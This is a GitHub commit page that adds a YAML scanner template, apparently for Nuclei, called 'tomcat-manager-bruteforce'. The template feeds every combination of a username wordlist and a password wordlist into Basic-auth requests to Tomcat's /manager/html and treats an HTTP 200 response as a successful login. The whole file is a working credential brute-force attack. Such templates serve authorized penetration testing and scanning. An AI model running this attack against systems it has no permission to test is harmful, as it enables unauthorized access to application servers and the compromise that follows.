Skip to content

Commit 9826772

Browse files
committed
adding tomcat manager bruteforce
1 parent f286253 commit 9826772

File tree

1 file changed

+30
-0
lines changed

1 file changed

+30
-0
lines changed
Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
id: tomcat-manager-bruteforce
2+
info:
3+
name: tomcat-manager-bruteforce-fuzzing
4+
author: pdteam
5+
severity: high
6+
7+
requests:
8+
- payloads:
9+
username: username.txt
10+
password: password.txt
11+
12+
# make sure you have your wordlist on the defind path.
13+
14+
attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb
15+
16+
raw:
17+
# Request with simple param and header manipulation with DSL functions
18+
- |
19+
GET /manager/html HTTP/1.1
20+
Host: {{Hostname}}
21+
Authorization: Basic {{base64(username:password)}}
22+
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
23+
Accept-Encoding: gzip, deflate
24+
Accept-Language: en-US,en;q=0.9
25+
Connection: close
26+
27+
matchers:
28+
- type: status
29+
status:
30+
- 200

0 commit comments

Comments
 (0)